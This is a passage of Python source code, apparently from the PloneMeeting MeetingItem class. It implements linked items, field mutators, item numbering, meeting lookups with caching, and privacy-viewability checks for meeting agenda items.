item_infos[item_uid] = None\n return item_infos[item_uid]\n\n # sorting method, items will be sorted by meeting date descending\n # then, for items that are not in a meeting, by creation date\n def _sortByMeetingDate(xUid, yUid):\n '''Sort method that will sort items by meetingDate.\n x and y are uids of items to sort.'''\n item1_infos = _get_item_infos(xUid)\n item1_created = item1_infos['item_created']\n item1_meeting_date = item1_infos['meeting_date']\n item2_infos = _get_item_infos(yUid)\n item2_created = item2_infos['item_created']\n item2_meeting_date = item2_infos['meeting_date']\n if item1_meeting_date and item2_meeting_date:\n # both items have a meeting, compare meeting dates\n return cmp(item2_meeting_date, item1_meeting_date)\n elif item1_meeting_date and not item2_meeting_date:\n # only item1 has a Meeting, it will be displayed after\n return 1\n elif not item1_meeting_date and item2_meeting_date:\n # only item2 has a Meeting, it will be displayed after\n return -1\n else:\n # no meeting at all, sort by item creation date\n return cmp(item1_created, item2_created)\n\n # update every item linked together that is still kept (in value)\n newUids = list(set(value).difference(set(stored)))\n # first build list of new uids that will be appended to every linked item\n newLinkedUids = []\n for newUid in newUids:\n # add every manually linked item of this newUid...\n newItem = _get_item_infos(newUid)['item']\n # getRawManuallyLinkedItems still holds old UID of deleted items\n # so we use getManuallyLinkedItems to be sure that item object still exists\n mLinkedItemUids = [tmp_item.UID() for tmp_item in newItem.getManuallyLinkedItems()]\n for mLinkedItemUid in mLinkedItemUids:\n if mLinkedItemUid not in newLinkedUids:\n newLinkedUids.append(mLinkedItemUid)\n # do not forget newUids\n newLinkedUids = newLinkedUids + newUids\n # we will also store this for self\n valueToStore = list(set(valueToStore).union(newLinkedUids))\n valueToStore.sort(_sortByMeetingDate)\n # for every linked item, also keep a back link to self\n newLinkedUids.append(self.UID())\n # now update every item (newLinkedUids + value)\n # make sure we do not have the same UID several times\n newLinkedUids = set(newLinkedUids).union(value)\n for linkedItemUid in newLinkedUids:\n # self UID is in newLinkedUids but is managed above, so skip it\n if linkedItemUid == self.UID():\n continue\n linkedItem = _get_item_infos(linkedItemUid)['item']\n # do not self reference\n newLinkedUidsToStore = list(newLinkedUids)\n if linkedItemUid in newLinkedUids:\n newLinkedUidsToStore.remove(linkedItemUid)\n newLinkedUidsToStore.sort(_sortByMeetingDate)\n linkedItem.getField('manuallyLinkedItems').set(linkedItem, newLinkedUidsToStore, **kwargs)\n # make change in linkedItem.at_ordered_refs until it is fixed in Products.Archetypes\n linkedItem._p_changed = True\n\n # now if links were removed, remove linked items on every removed item...\n removedUids = set(stored).difference(set(value))\n for removedUid in removedUids:\n removedItemBrains = unrestrictedSearch(UID=removedUid)\n if not removedItemBrains:\n continue\n removedItem = removedItemBrains[0]._unrestrictedGetObject()\n removedItem.getField('manuallyLinkedItems').set(removedItem, [], **kwargs)\n # make change in linkedItem.at_ordered_refs until it is fixed in Products.Archetypes\n removedItem._p_changed = True\n\n # save newUids, newLinkedUids and removedUids in the REQUEST\n # so they can be used by submethods like subscribers\n self.REQUEST.set('manuallyLinkedItems_newUids', newUids)\n self.REQUEST.set('manuallyLinkedItems_newLinkedUids', newLinkedUids)\n self.REQUEST.set('manuallyLinkedItems_removedUids', removedUids)\n\n self.getField('manuallyLinkedItems').set(self, valueToStore, **kwargs)\n # make change in linkedItem.at_ordered_refs until it is fixed in Products.Archetypes\n self._p_changed = True\n\n security.declareProtected(ModifyPortalContent, 'setPreferredMeeting')\n\n def setPreferredMeeting(self, value, **kwargs):\n '''Overrides the field 'preferredMeeting' mutator to be able to\n update_preferred_meeting if value changed.'''\n field = self.getField('preferredMeeting')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n if not value:\n value = ITEM_NO_PREFERRED_MEETING_VALUE\n self._update_preferred_meeting(value)\n field.set(self, value, **kwargs)\n\n def _mark_need_update(self, update_item_references=True, update_committees=True, extra_markers=[]):\n '''See docstring in interfaces.py.'''\n if update_item_references:\n # add a value in the REQUEST to specify that update_item_references is needed\n self.REQUEST.set('need_Meeting_update_item_references', True)\n if update_committees:\n # add a value in the REQUEST to specify that update_committees is needed\n self.REQUEST.set('need_MeetingItem_update_committees', True)\n for extra_marker in extra_markers:\n self.REQUEST.set(extra_marker, True)\n\n def _annex_decision_addable_states_after_validation(self, cfg, item_state):\n '''See doc in interfaces.py.'''\n return cfg.getItemDecidedStates()\n\n def may_add_annex_decision(self, cfg, item_state):\n \"\"\" \"\"\"\n addable_states = self.adapted()._annex_decision_addable_states_after_validation(cfg, item_state)\n return addable_states == \"*\" or item_state in addable_states\n\n security.declareProtected(ModifyPortalContent, 'setCategory')\n\n def setCategory(self, value, **kwargs):\n '''Overrides the field 'category' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('category')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n # add a value in the REQUEST to specify that update_groups_in_charge is needed\n self._mark_need_update(extra_markers=['need_MeetingItem_update_groups_in_charge_category'])\n field.set(self, value, **kwargs)\n\n 
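# a minimal sketch of the mutator-override pattern shared by setCategory\n # above and setClassifier/setProposingGroup below; 'example' and its\n # request marker are hypothetical names:\n #\n # def setExample(self, value, **kwargs):\n #     field = self.getField('example')\n #     if value != field.get(self, **kwargs):\n #         # only mark the item for update when the value really changed\n #         self._mark_need_update(\n #             extra_markers=['need_MeetingItem_update_example'])\n #     field.set(self, value, **kwargs)\n\n 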
security.declareProtected(ModifyPortalContent, 'setClassifier')\n\n def setClassifier(self, value, **kwargs):\n '''Overrides the field 'classifier' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('classifier')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n # add a value in the REQUEST to specify that update_groups_in_charge is needed\n self._mark_need_update(extra_markers=['need_MeetingItem_update_groups_in_charge_classifier'])\n field.set(self, value, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'setProposingGroup')\n\n def setProposingGroup(self, value, **kwargs):\n '''Overrides the field 'proposingGroup' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('proposingGroup')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n # add a value in the REQUEST to specify that update_groups_in_charge is needed\n self._mark_need_update(extra_markers=['need_MeetingItem_update_groups_in_charge_proposing_group'])\n field.set(self, value, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'setProposingGroupWithGroupInCharge')\n\n def setProposingGroupWithGroupInCharge(self, value, **kwargs):\n '''Overrides the field 'proposingGroupWithGroupInCharge' mutator to be able to\n set a correct 'proposingGroup' and 'groupsInCharge' from received value.'''\n field = self.getField('proposingGroupWithGroupInCharge')\n current_value = field.get(self, **kwargs)\n if not value == current_value:\n # value may be empty if used on an itemTemplate\n proposingGroup = groupInCharge = ''\n if value:\n proposingGroup, groupInCharge = value.split('__groupincharge__')\n self.setProposingGroup(proposingGroup)\n self.setGroupsInCharge([groupInCharge])\n field.set(self, value, **kwargs)\n\n def _adaptLinesValueToBeCompared(self, value):\n \"\"\"'value' received from processForm does not correspond to what is stored\n for LinesField, we need to adapt it so it may be compared.\n This is completely taken from Products.Archetypes.Field.LinesField.set.\"\"\"\n\n if isinstance(value, basestring):\n value = value.split('\\n')\n value = [v for v in value if v and v.strip()]\n return tuple(value)\n\n security.declareProtected(ModifyPortalContent, 'setOtherMeetingConfigsClonableTo')\n\n def setOtherMeetingConfigsClonableTo(self, value, **kwargs):\n '''Overrides the field 'otherMeetingConfigsClonableTo' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('otherMeetingConfigsClonableTo')\n current_value = field.get(self, **kwargs)\n if self._adaptLinesValueToBeCompared(value) != current_value:\n # add a value in the REQUEST to specify that update_item_references is needed\n self._mark_need_update(update_committees=False)\n field.set(self, value, **kwargs)\n\n security.declareProtected(View, 'getManuallyLinkedItems')\n\n def getManuallyLinkedItems(self, only_viewable=False, **kwargs):\n '''Overrides the field 'manuallyLinkedItems' accessor to be able\n to return only items that are viewable by the current user.'''\n linkedItems = self.getField('manuallyLinkedItems').get(self, **kwargs)\n if linkedItems:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n linkedItems = [\n linkedItem for linkedItem in linkedItems if\n self._appendLinkedItem(\n linkedItem, tool, cfg, only_viewable=only_viewable)]\n return linkedItems\n\n security.declarePublic('onDiscussChanged')\n\n def onDiscussChanged(self, toDiscuss):\n 
security.declarePublic('onDiscussChanged')\n\n def onDiscussChanged(self, toDiscuss):\n '''See doc in interfaces.py.'''\n pass\n\n security.declarePublic('isDefinedInTool')\n\n def isDefinedInTool(self, item_type=None):\n '''Is this item being defined in the tool (portal_plonemeeting) ?\n p_item_type can be :\n - None, we return True for any item defined in the tool;\n - 'recurring', we return True if it is a recurring item defined in the tool;\n - 'itemtemplate', we return True if it is an item template defined in the tool.'''\n is_in_tool = 'portal_plonemeeting' in self.absolute_url()\n if item_type is None:\n return is_in_tool\n elif item_type == 'recurring':\n return is_in_tool and self.portal_type.startswith('MeetingItemRecurring')\n elif item_type == 'itemtemplate':\n return is_in_tool and self.portal_type.startswith('MeetingItemTemplate')\n\n security.declarePublic('showClonableToOtherMCs')\n\n def showClonableToOtherMCs(self):\n '''Returns True if the current item can be cloned to another\n meetingConfig. This method is used as a condition for showing\n or not the 'otherMeetingConfigsClonableTo' field.'''\n res = False\n if self.getOtherMeetingConfigsClonableTo():\n res = True\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = cfg.getMeetingConfigsToCloneTo()\n return res\n\n security.declarePublic('showAdvancedClonableToOtherMCs')\n\n def showAdvancedClonableToOtherMCs(self, showClonableToOtherMCs=False):\n '''Display otherMeetingConfigsClonableTo as advanced or not.\n Advanced mode is used when the functionality is enabled and the relevant\n otherMeetingConfigsClonableToFieldXXX fields are used.'''\n item = self.getSelf()\n res = False\n if showClonableToOtherMCs:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n res = bool(self.get_enable_clone_to_other_mc_fields(cfg))\n return res\n\n security.declarePublic('getItemNumber')\n\n def getItemNumber(self, relativeTo='meeting', for_display=False, **kwargs):\n '''This accessor for the 'itemNumber' field is overridden to allow getting\n the item number in various flavours:\n - the item number relative to the whole meeting (no matter the item\n being \"normal\" or \"late\"): p_relativeTo=\"meeting\";\n - the item number relative to the whole meeting config:\n p_relativeTo=\"meetingConfig\".\n If p_for_display is True, it will return a displayable value :\n - 100 is displayed '1';\n - 102 is displayed '1.2';\n - 111 is displayed '1.11'.'''\n # when 'field' and 'encoding' in kwargs, it means that getRaw is called\n if 'field' in kwargs and 'encoding' in kwargs:\n return self.getField('itemNumber').get(self, **kwargs)\n\n # this method is only relevant if the item is in a meeting\n if not self.hasMeeting():\n return 0\n\n res = self.getField('itemNumber').get(self, **kwargs)\n if relativeTo == 'meetingConfig':\n meeting = self.getMeeting()\n meetingFirstItemNumber = meeting.first_item_number\n if meetingFirstItemNumber != -1:\n res = meetingFirstItemNumber * 100 + self.getItemNumber(relativeTo='meeting') - 100\n else:\n # here we need to know what is the \"base number\" to compute the item number on :\n # we call findBaseNumberRelativeToMeetingConfig, see docstring there\n # call the view on meeting because it is memoized and for example in meeting_view\n # the meeting does not change but the item does\n view = getMultiAdapter((meeting, self.REQUEST), name='pm_unrestricted_methods')\n currentMeetingComputedFirstNumber = view.findFirstItemNumber()\n # now that we have the currentMeetingComputedFirstNumber, that is\n # the theoretical current meeting first number, we can compute the current item\n # number, that is this number + current item number relativeTo the meeting - 1\n res = currentMeetingComputedFirstNumber * 100 + self.getItemNumber(relativeTo='meeting') - 100\n # we want '1' instead of '100' and '2.15' instead of 215\n if for_display:\n return _storedItemNumber_to_itemNumber(res, forceShowDecimal=False)\n return res\n\n
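# Hedged sketch (not the original _storedItemNumber_to_itemNumber\n # implementation): how the stored-number encoding documented in\n # getItemNumber above maps to the displayed value, assuming the\n # hundreds/remainder scheme.\n @staticmethod\n def _demo_item_number_display(stored):\n '''E.g. 100 -> '1', 102 -> '1.2', 111 -> '1.11'.'''\n integer, decimal = divmod(stored, 100)\n return str(integer) if not decimal else '%d.%d' % (integer, decimal)\n\n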
security.declarePublic('getDefaultToDiscuss')\n\n def getDefaultToDiscuss(self):\n '''Get default value for field 'toDiscuss' from the MeetingConfig.'''\n res = True\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if cfg:\n # When creating an item through invokeFactory (like recurring\n # items), getMeetingConfig does not work because the Archetypes\n # object is not properly initialized yet (portal_type is not set\n # correctly yet)\n res = cfg.getToDiscussDefault()\n return res\n\n security.declarePublic('getDefaultPollType')\n\n def getDefaultPollType(self):\n '''Get default value for field 'pollType' from the MeetingConfig.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.getDefaultPollType()\n\n def _update_meeting_link(self, meeting):\n \"\"\"Store the linked meeting UID and path.\n Storing the path is required for the indexation\n because a clear_and_rebuild would not find the element by UID.\"\"\"\n self.linked_meeting_uid = None\n self.linked_meeting_path = None\n if meeting is not None:\n self.linked_meeting_uid = meeting.UID()\n self.linked_meeting_path = \"/\".join(meeting.getPhysicalPath())\n\n def _update_preferred_meeting(self, preferred_meeting_uid):\n \"\"\"Store the preferred meeting UID and path.\n Storing the path is required for the indexation\n because a clear_and_rebuild would not find the element by UID.\"\"\"\n self.preferred_meeting_path = None\n if preferred_meeting_uid != ITEM_NO_PREFERRED_MEETING_VALUE:\n meeting_brain = uuidToCatalogBrain(preferred_meeting_uid, unrestricted=True)\n # necessary for restapi as value is set before being validated...\n # if passing a wrong value, meeting_brain is an empty result\n if meeting_brain:\n self.preferred_meeting_path = meeting_brain.getPath()\n\n def _update_predecessor(self, predecessor):\n '''Only one predecessor possible but several successors.\n If p_predecessor=None, we remove predecessor/successors attributes.\n Storing the path is required for the indexation\n because a clear_and_rebuild would not find the element by UID.'''\n if predecessor is not None:\n self.linked_predecessor_uid = predecessor.UID()\n self.linked_predecessor_path = \"/\".join(predecessor.getPhysicalPath())\n if not getattr(predecessor, 'linked_successor_uids', None):\n predecessor.linked_successor_uids = PersistentList()\n # update successors for predecessor\n predecessor.linked_successor_uids.append(self.UID())\n else:\n safe_delattr(self, 'linked_predecessor_uid')\n safe_delattr(self, 'linked_predecessor_path')\n safe_delattr(self, 'linked_successor_uids')\n\n def get_successor(self, the_objects=True, unrestricted=True):\n \"\"\"Shortcut to get the last successor, that should be the official successor.\"\"\"\n # we force ordered=True for get_successors to make sure the last successor\n # is the last chronologically created\n successors = self.get_successors(\n the_objects=the_objects, ordered=True, unrestricted=unrestricted)\n return successors and successors[-1] or None\n\n def get_successors(self, the_objects=True, ordered=True, unrestricted=True):\n '''Return the successors, so the 
items that were automatically linked to self.\n Most of the time there will be one single successor, but it may happen\n that several successors exist, for example when an item is delayed then corrected\n then delayed again; most of the time one of the 2 successors will be deleted\n but it is not always the case...'''\n res = getattr(self, 'linked_successor_uids', [])\n if res and the_objects:\n # res is a PersistentList, not working with catalog query\n # searching successors ordered will make sure that items are returned chronologically\n res = uuidsToObjects(uuids=tuple(res), ordered=ordered, unrestricted=unrestricted)\n return res\n\n def get_every_successors(obj, the_objects=True, unrestricted=True):\n '''Loop recursively through every successor of p_obj and return them.'''\n def recurse_successors(successors, res=[]):\n for successor in successors:\n res.append(successor)\n # pass res explicitly so the recursion keeps appending to the same list\n recurse_successors(successor.get_successors(), res)\n return res\n res = recurse_successors(obj.get_successors(\n the_objects=the_objects, unrestricted=unrestricted))\n return res\n\n def get_predecessor(self, the_object=True, unrestricted=True):\n '''Return the predecessor, as an object by default.'''\n res = getattr(self, 'linked_predecessor_uid', None)\n if res and the_object:\n portal = api.portal.get()\n predecessor_path = self.linked_predecessor_path\n res = portal.unrestrictedTraverse(predecessor_path)\n return res\n\n security.declarePublic('get_predecessors')\n\n def get_predecessors(self, only_viewable=False, include_successors=True):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n predecessor = item.get_predecessor()\n predecessors = []\n # retrieve every predecessor\n while predecessor:\n if item._appendLinkedItem(predecessor, tool, cfg, only_viewable=only_viewable):\n predecessors.append(predecessor)\n predecessor = predecessor.get_predecessor()\n # keep order\n predecessors.reverse()\n # retrieve successors too\n if include_successors:\n successors = item.get_every_successors()\n successors = [successor for successor in successors\n if item._appendLinkedItem(successor, tool, cfg, only_viewable)]\n predecessors += successors\n return predecessors\n\n security.declarePublic('displayLinkedItem')\n\n def displayLinkedItem(self, item):\n '''Return an HTML structure to display a linked item.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meeting = item.hasMeeting()\n # display the meeting date if the item is linked to a meeting\n if meeting:\n title = item.Title(withMeetingDate=True)\n return tool.getColoredLink(item,\n showColors=True,\n showContentIcon=True,\n contentValue=title)\n else:\n # try to share cache of getPrettyLink\n return item.getPrettyLink()\n\n def getMeeting(self, only_uid=False, caching=True):\n '''Returns the linked meeting if it exists.'''\n res = None\n if only_uid:\n res = getattr(self, 'linked_meeting_uid', None)\n else:\n meeting_path = getattr(self, 'linked_meeting_path', None)\n if meeting_path:\n if caching and hasattr(self, \"REQUEST\"):\n meeting_uid = getattr(self, 'linked_meeting_uid', None)\n res = self.REQUEST.get('meeting__%s' % meeting_uid)\n if not res:\n portal = api.portal.get()\n res = portal.unrestrictedTraverse(meeting_path)\n if caching and hasattr(self, \"REQUEST\"):\n self.REQUEST.set('meeting__%s' % meeting_uid, res)\n return res\n\n def getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath_cachekey(method, self):\n '''cachekey method for self.getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath.'''\n # valid until a 
meeting was modified (date or review_state)\n # and when preferredMeeting is still the same\n date_date = get_cachekey_volatile('Products.PloneMeeting.Meeting.date')\n date_review_state = get_cachekey_volatile('Products.PloneMeeting.Meeting.review_state')\n return repr(self), self.getPreferredMeeting(), date_date, date_review_state\n\n @ram.cache(getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath_cachekey)\n def getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath(self):\n \"\"\"Cached method used by getMeetingToInsertIntoWhenNoCurrentMeetingObject.\"\"\"\n res = None\n # first, find meetings in the future still accepting items\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # do a list with meetingStates so it is not considered as a tuple by getMeetingsAcceptingItems\n # indeed, in some cases the tuple ('created', 'frozen') behaves specifically\n meetingStates = list(cfg.getMeetingPresentItemWhenNoCurrentMeetingStates())\n brains = []\n preferredMeeting = self.getPreferredMeeting()\n if preferredMeeting != ITEM_NO_PREFERRED_MEETING_VALUE:\n # preferredMeeting, try to get it from meetingsAcceptingItems or\n # use meetingsAcceptingItems in the future\n brains = cfg.getMeetingsAcceptingItems(review_states=meetingStates)\n brains = [brain for brain in brains if brain.UID == preferredMeeting]\n\n # extend brains with other meetings accepting items, this way if the preferred meeting\n # does not accept items, we will have other possibilities\n # no preferredMeeting or it was not found in meetingsAcceptingItems\n # take into account meetings in the future\n brains += list(cfg.getMeetingsAcceptingItems(\n review_states=meetingStates, inTheFuture=True))\n\n for brain in brains:\n meeting = brain.getObject()\n # find a meeting that is really accepting current item\n # in case meeting is frozen, make sure current item isLateFor(meeting)\n # also in case no meetingStates, a closed meeting could be returned, check\n # that current user may edit returned meeting\n if meeting.wfConditions().may_accept_items() and \\\n (not meeting.is_late() or self.wfConditions().isLateFor(meeting)):\n res = meeting\n break\n return res and \"/\".join(res.getPhysicalPath())\n\n
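# Hedged sketch (illustrative only, assuming plone.memoize's ram module\n # already imported above): the pattern used by the cached methods in\n # this class, where the tuple returned by the cachekey function decides\n # when the cached value may be reused.\n def _demo_cachekey(method, self):\n '''Results are shared until the item is modified.'''\n return repr(self), self.modified()\n\n @ram.cache(_demo_cachekey)\n def _demo_cached_computation(self):\n # recomputed only when the cachekey tuple above changes\n return self.UID()\n\n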
def getMeetingToInsertIntoWhenNoCurrentMeetingObject(self):\n '''Return the meeting the item will be inserted into in case the 'present'\n transition is triggered from another view than the meeting view. This will take into\n account meeting states defined in MeetingConfig.meetingPresentItemWhenNoCurrentMeetingStates.'''\n meeting_path = self.getMeetingToInsertIntoWhenNoCurrentMeetingObjectPath()\n meeting = None\n if meeting_path:\n portal = api.portal.get()\n meeting = portal.unrestrictedTraverse(meeting_path)\n return meeting\n\n def _getOtherMeetingConfigsImAmClonedIn(self):\n '''Returns a list of meetingConfig ids self has been cloned to'''\n ann = IAnnotations(self)\n res = []\n for k in ann:\n if k.startswith(SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY):\n res.append(k.replace(SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY, ''))\n return res\n\n def isPrivacyViewable_cachekey(method, self):\n '''cachekey method for self.isPrivacyViewable.'''\n item = self.getSelf()\n if item.getPrivacy().startswith('public'):\n return True\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if not cfg.getRestrictAccessToSecretItems() or tool.isManager(cfg):\n return True\n date = get_cachekey_volatile('_users_groups_value')\n return repr(item), item.modified(), get_plone_groups_for_user(), date\n\n security.declarePublic('isPrivacyViewable')\n\n @ram.cache(isPrivacyViewable_cachekey)\n def isPrivacyViewable(self):\n '''Check doc in interfaces.py.'''\n # Checking the 'privacy condition' is only done if privacy is 'secret'.\n item = self.getSelf()\n privacy = item.getPrivacy()\n # 'public' or 'public_heading' items\n if privacy.startswith('public'):\n return True\n # check if privacy needs to be checked...\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if not cfg.getRestrictAccessToSecretItems():\n return True\n # Bypass privacy check for (Meeting)Manager\n if tool.isManager(cfg):\n return True\n\n # now check if among local_roles, a role is giving view access to the item\n # for a group that the current user is member of, except powerobservers groups\n userGroups = get_plone_groups_for_user()\n po_suffixes = tuple(po['row_id'] for po in cfg.getPowerObservers())\n itemUserRoles = [roles for group_id, roles in item.__ac_local_roles__.items()\n if group_id in userGroups and not group_id.endswith(po_suffixes)]\n # merge lists and remove duplicates\n itemUserRoles = set(list(itertools.chain.from_iterable(itemUserRoles)))\n if itemUserRoles.intersection(item._View_Permission):\n return True\n\n # check if current user is a power observer in MeetingConfig.restrictAccessToSecretItemsTo\n restricted_power_obs = cfg.getRestrictAccessToSecretItemsTo()\n if restricted_power_obs and \\\n tool.isPowerObserverForCfg(cfg, power_observer_types=restricted_power_obs):\n return False\n\n # a power observer not in restrictAccessToSecretItemsTo?\n if tool.isPowerObserverForCfg(cfg):\n return True\n\n def isViewable(self):\n \"\"\"Is the item viewable by the current user?\"\"\"\n return _checkPermission(View, self)\n\n security.declarePublic('getAllCopyGroups')\n\n def getAllCopyGroups(self, auto_real_plone_group_ids=False):\n \"\"\"Return manually selected copyGroups and automatically added ones.\n If p_auto_real_plone_group_ids is True, the real Plone group id is returned for\n automatically added groups instead of the AUTO_COPY_GROUP_PREFIX prefixed name.\"\"\"\n allGroups = self.getCopyGroups()\n if auto_real_plone_group_ids:\n allGroups += tuple([self._realCopyGroupId(plone_group_id)\n for plone_group_id in self.autoCopyGroups])\n else:\n allGroups += tuple(self.autoCopyGroups)\n return allGroups\n\n
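# Hedged sketch (illustrative only) of the local-roles check performed\n # in isPrivacyViewable above: merge the role lists granted to the\n # user's groups, then test the intersection with the roles carrying\n # the View permission.\n @staticmethod\n def _demo_roles_give_view(local_roles, user_groups, view_roles):\n '''E.g. local_roles={'group1': ['Reader']}, user_groups=['group1'],\n view_roles=('Manager', 'Reader') -> True.'''\n granted = [roles for group_id, roles in local_roles.items()\n if group_id in user_groups]\n merged = set(itertools.chain.from_iterable(granted))\n return bool(merged.intersection(view_roles))\n\n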
def check_copy_groups_have_access(self):\n \"\"\"Return True if copyGroups have access in the current review_state.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return self.query_state() in cfg.getItemCopyGroupsStates()\n\n security.declarePublic('checkPrivacyViewable')\n\n def checkPrivacyViewable(self):\n '''Raises Unauthorized if the item is not privacy-viewable.'''\n if not self.adapted().isPrivacyViewable():\n raise Unauthorized\n\n security.declarePublic('getExtraFieldsToCopyWhenCloning')\n\n def getExtraFieldsToCopyWhenCloning(self, cloned_to_same_mc, cloned_from_item_template):\n '''Check doc in interfaces.py.'''\n return []\n\n security.declarePrivate('listMeetingsAcceptingItems')\n\n def listMeetingsAcceptingItems(self):\n '''Returns the (Display)list of meetings returned by\n MeetingConfig.getMeetingsAcceptingItems.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n\n # while passing empty review_states, it is computed depending\n # on the fact that current user isManager or not\n for meetingBrain in cfg.getMeetingsAcceptingItems(review_states=[]):\n meetingDate = tool.format_date(meetingBrain.meeting_date, with_hour=True)\n meetingState = translate(meetingBrain.review_state,\n domain=\"plone\",\n context=self.REQUEST)\n res.append((meetingBrain.UID,\n u\"{0} ({1})\".format(meetingDate,\n meetingState)))\n # if one preferred meeting was already defined on self, add it\n # to the vocabulary or editing an older item could lose that information\n preferredMeetingUID = self.getPreferredMeeting()\n # add it if we actually have a preferredMeetingUID stored\n # and if it is not yet in the vocabulary!\n if preferredMeetingUID and \\\n preferredMeetingUID != ITEM_NO_PREFERRED_MEETING_VALUE and \\\n preferredMeetingUID not in [meetingInfo[0] for meetingInfo in res]:\n # check that stored preferredMeeting still exists, if it\n # is the case, add it to the vocabulary\n brain = uuidToCatalogBrain(preferredMeetingUID, unrestricted=True)\n if brain:\n preferredMeetingDate = tool.format_date(\n brain.meeting_date, with_hour=True)\n preferredMeetingState = translate(brain.review_state,\n domain=\"plone\",\n context=self.REQUEST)\n res.append((brain.UID,\n u\"{0} ({1})\".format(preferredMeetingDate, preferredMeetingState)))\n res.reverse()\n res.insert(0, (ITEM_NO_PREFERRED_MEETING_VALUE, 'Any meeting'))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listMeetingTransitions')\n\n def listMeetingTransitions(self):\n '''Lists the possible transitions for meetings of the same meeting\n config as this item.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = DisplayList(\n tuple((\n ('_init_',\n translate('_init_', domain=\"plone\", context=self.REQUEST)), ))\n )\n res += cfg.listMeetingTransitions()\n return res\n\n security.declarePrivate('listOtherMeetingConfigsClonableTo')\n\n def listOtherMeetingConfigsClonableTo(self):\n '''Lists the possible other meetingConfigs the item can be cloned to.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n res = []\n for mctct in meetingConfig.getMeetingConfigsToCloneTo():\n res.append((mctct['meeting_config'], getattr(tool, mctct['meeting_config']).Title()))\n # make sure otherMeetingConfigsClonableTo actually stored have their corresponding\n # term in the vocabulary, if not, add it\n otherMeetingConfigsClonableTo = self.getOtherMeetingConfigsClonableTo()\n if otherMeetingConfigsClonableTo:\n otherMeetingConfigsClonableToInVocab = [term[0] 
for term in res]\n for meetingConfigId in otherMeetingConfigsClonableTo:\n if meetingConfigId not in otherMeetingConfigsClonableToInVocab:\n res.append((meetingConfigId, getattr(tool, meetingConfigId).Title()))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listOtherMeetingConfigsClonableToEmergency')\n\n def listOtherMeetingConfigsClonableToEmergency(self):\n '''Lists the possible other meetingConfigs the item can be cloned to.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n res = []\n translated_msg = translate('Emergency while presenting in other MC',\n domain='PloneMeeting',\n context=self.REQUEST)\n for mctct in meetingConfig.getMeetingConfigsToCloneTo():\n res.append((mctct['meeting_config'], translated_msg))\n # make sure otherMeetingConfigsClonableToEmergency actually stored have their corresponding\n # term in the vocabulary, if not, add it\n otherMCsClonableToEmergency = self.getOtherMeetingConfigsClonableToEmergency()\n if otherMCsClonableToEmergency:\n otherMeetingConfigsClonableToEmergencyInVocab = [term[0] for term in res]\n for meetingConfigId in otherMCsClonableToEmergency:\n if meetingConfigId not in otherMeetingConfigsClonableToEmergencyInVocab:\n res.append((meetingConfigId, translated_msg))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listOtherMeetingConfigsClonableToPrivacy')\n\n def listOtherMeetingConfigsClonableToPrivacy(self):\n '''Lists the possible other meetingConfigs the item can be cloned to.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n res = []\n translated_msg = translate('Secret while presenting in other MC?',\n domain='PloneMeeting',\n context=self.REQUEST)\n for mctct in meetingConfig.getMeetingConfigsToCloneTo():\n res.append((mctct['meeting_config'], translated_msg))\n # make sure otherMeetingConfigsClonableToPrivacy actually stored have their corresponding\n # term in the vocabulary, if not, add it\n otherMCsClonableToPrivacy = self.getOtherMeetingConfigsClonableToPrivacy()\n if otherMCsClonableToPrivacy:\n otherMeetingConfigsClonableToPrivacyInVocab = [term[0] for term in res]\n for meetingConfigId in otherMCsClonableToPrivacy:\n if meetingConfigId not in otherMeetingConfigsClonableToPrivacyInVocab:\n res.append((meetingConfigId, translated_msg))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listItemTags')\n\n def listItemTags(self):\n '''Lists the available tags from the meeting config.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n for tag in cfg.getAllItemTags().split('\\n'):\n res.append((tag, tag))\n return DisplayList(tuple(res))\n\n security.declarePrivate('listEmergencies')\n\n def listEmergencies(self):\n '''Vocabulary for the 'emergency' field.'''\n d = 'PloneMeeting'\n res = DisplayList((\n (\"no_emergency\", translate('no_emergency',\n domain=d,\n context=self.REQUEST)),\n (\"emergency_asked\", translate('emergency_asked',\n domain=d,\n 